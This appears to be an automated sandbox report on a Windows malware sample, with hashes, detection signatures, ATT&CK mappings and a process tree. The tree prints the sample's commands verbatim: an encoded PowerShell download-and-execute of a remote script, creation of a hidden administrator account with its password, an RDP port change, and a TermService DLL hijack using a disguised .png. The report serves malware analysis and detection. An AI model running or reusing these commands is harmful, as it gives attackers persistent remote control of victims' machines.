Overview

overview

10

Static

static

689d8b997a...98.exe

windows7_x64

10

689d8b997a...98.exe

windows10_x64

10

Analysis

  • max time kernel
    125s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    12-11-2020 14:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe

  • Size

    3.4MB

  • MD5

    a8d7894060ed9e3a80de995fcbf81864

  • SHA1

    8ed59a83db92328d05ec05af58f2b4e259be3af4

  • SHA256

    689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98

  • SHA512

    5e66992066cf9e0a698cf1271068a5c73aa0f8769b4b712317e528b8da83ca1780a730e72e19c4c20358b351e44692bfb6a957a0e782873063597baa3d97fa59

Score
10/10
persistenceupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies service 2 TTPs 2 IoCs
    persistence
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 217 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 77 IoCs
  • Suspicious use of WriteProcessMemory 68 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
    "C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:984
    • \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3156
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2424
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABE5.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjt0zup\CSC6AEF796A864D438BCECA6AB8CF2FC.TMP"
          4⤵
            PID:4088
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3808
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:3984
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1416
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2152
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2148
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1592
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3076
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3796
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3500
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2284
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:896
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:928
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1332
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:3488
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3888
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user updwin Ghasar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:476
                    • C:\Windows\system32\net.exe
                      net.exe user updwin Ghasar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3996
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user updwin Ghasar4f5 /del
                        3⤵
                          PID:212
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user updwin a7ZkH15H /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2124
                      • C:\Windows\system32\net.exe
                        net.exe user updwin a7ZkH15H /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1728
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user updwin a7ZkH15H /add
                          3⤵
                            PID:3116
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1036
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3924
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
                            3⤵
                              PID:2200
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1752
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3512
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
                              3⤵
                                PID:3944
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3796
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" updwin /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3296
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
                                3⤵
                                  PID:2560
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user updwin a7ZkH15H
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1960
                              • C:\Windows\system32\net.exe
                                net.exe user updwin a7ZkH15H
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4032
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user updwin a7ZkH15H
                                  3⤵
                                    PID:3776
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:812
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:1440
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3820
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                      PID:512
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2312
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      2⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2152
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        3⤵
                                        • Blacklisted process makes network request
                                        • Drops file in Program Files directory
                                        • Drops file in Windows directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4072

                                  Network

                                  MITRE ATT&CK Matrix ATT&CK v6

                                  Initial Access

                                  Execution

                                  Persistence

                                  Account Manipulation

                                  1
                                  T1098

                                  Registry Run Keys / Startup Folder

                                  1
                                  T1060

                                  Modify Existing Service

                                  1
                                  T1031

                                  Privilege Escalation

                                  Defense Evasion

                                  Modify Registry

                                  3
                                  T1112

                                  Credential Access

                                  Discovery

                                  Lateral Movement

                                  Remote Desktop Protocol

                                  1
                                  T1076

                                  Collection

                                  Exfiltration

                                  Command and Control

                                  Impact

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Temp\RESABE5.tmp
                                    MD5

                                    d7caad440a8e0f1dece3f1df6a9edd79

                                    SHA1

                                    d7ff284381c115816759b43f3d9fa7df8e26f358

                                    SHA256

                                    c29aa192e220432fd08b810aca67225f6520be61db8773b920a0aaae5861acd2

                                    SHA512

                                    75a4a24cf98d2b034e3b81fe50b8910fb7483b4db6f0e8657cfdc7ef3fba0e0932f1ccdc63e70900e47e9ef45cb85de68b78fa9a017035edc2560a6e81bc93ff

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                    MD5

                                    dac6b25db50155c0c78d5bf64fb95fa3

                                    SHA1

                                    9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

                                    SHA256

                                    6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

                                    SHA512

                                    679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                    MD5

                                    7cac19b2868c41555db4b71219217f9b

                                    SHA1

                                    d6f77db578db3c5c572c3a944d9072ed00560dcb

                                    SHA256

                                    d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

                                    SHA512

                                    5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.dll
                                    MD5

                                    d18740618b9e089d99a39dd09bf9959d

                                    SHA1

                                    df977c9ae75ef10ed16a02f3714eabfae85ae2c8

                                    SHA256

                                    9f08a8e40c464fcb0a7da9dcc0aefe01d5d699deb611a9ffc17356c9e7cfba7e

                                    SHA512

                                    d3c5261155ab552291dea86171f15d075850f7b7cbda2b8f816aaba7fe20dcc5d051f60a5058d0ee7d1addd589be824490c0936510a2eae14af70ab78b8c0b63

                                    Download Submit
                                  • \??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\CSC6AEF796A864D438BCECA6AB8CF2FC.TMP
                                    MD5

                                    fad80ee43652ede2b2a925636b6afaf2

                                    SHA1

                                    1deb52e7c868612d96fe120b219c578935f7dae2

                                    SHA256

                                    791a419f2e73a2febcc5d5768fdc09c806ca6899b94f9c59fb0b4fd4bbc4f8cb

                                    SHA512

                                    c3a2c5d1c394d4e30abbc6ea82a0c87e3416ad54c94f4692b709a6100157882e12a5dcd5ae2ce3b9b68090eab771118f5b7926f9d45e3f0098ffdbe261d704c9

                                    Download Submit
                                  • \??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.0.cs
                                    MD5

                                    6f235215132cdebacd0f793fe970d0e3

                                    SHA1

                                    2841e44c387ed3b6f293611992f1508fe9b55b89

                                    SHA256

                                    ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                    SHA512

                                    a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                    Download Submit
                                  • \??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.cmdline
                                    MD5

                                    8dd7e19d4dfad47dcf67542b35be5a11

                                    SHA1

                                    56ddc8395bce28584087cfa6ffded7e5476bc00b

                                    SHA256

                                    f35634561390ebffbd3ec2d78b6b52c3c3605e0dbe0ceca9b406550519267032

                                    SHA512

                                    807716cf1080d19a47bfd4700efbe5c3fc80abcce2ca601a070e0fe7d44c811131d3b92f40c0b1e34fcb59e887b09f143ed5ab7424f6dc4e4387f30730c285ae

                                    Download Submit
                                  • \Windows\Branding\mediasrv.png
                                    MD5

                                    eeb448ea2709c57b9ea2e223d0c79396

                                    SHA1

                                    38331dd027386151ee37a29a7820570a76427b02

                                    SHA256

                                    c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

                                    SHA512

                                    c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

                                    Download Submit
                                  • \Windows\Branding\mediasvc.png
                                    MD5

                                    bb873bd05a47f502ee4ed3c4ea749a4f

                                    SHA1

                                    e55a6bf49a4833fb9e9b123df39dac9bf507f75a

                                    SHA256

                                    a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

                                    SHA512

                                    ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

                                    Download Submit
                                  • memory/212-31-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/512-43-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/896-25-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/928-26-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/984-1-0x0000000001850000-0x0000000001851000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/1332-27-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1416-17-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1440-42-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1592-20-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1728-32-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2148-19-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2152-44-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2152-18-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2200-35-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2284-24-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2424-7-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2560-39-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3076-21-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3116-33-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3156-5-0x0000015B76000000-0x0000015B76001000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/3156-3-0x00007FF81FB40000-0x00007FF82052C000-memory.dmp
                                    Filesize

                                    9.9MB

                                    Download
                                  • memory/3156-4-0x0000015B5B9E0000-0x0000015B5B9E1000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/3156-2-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3156-14-0x0000015B75F80000-0x0000015B75F81000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/3296-38-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3488-50-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3500-23-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3512-36-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3776-41-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3796-22-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3808-15-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3888-51-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3924-34-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3944-37-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3984-16-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3996-30-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4032-40-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4072-45-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4072-46-0x00007FF81FB40000-0x00007FF82052C000-memory.dmp
                                    Filesize

                                    9.9MB

                                    Download
                                  • memory/4088-10-0x0000000000000000-mapping.dmp
                                    Download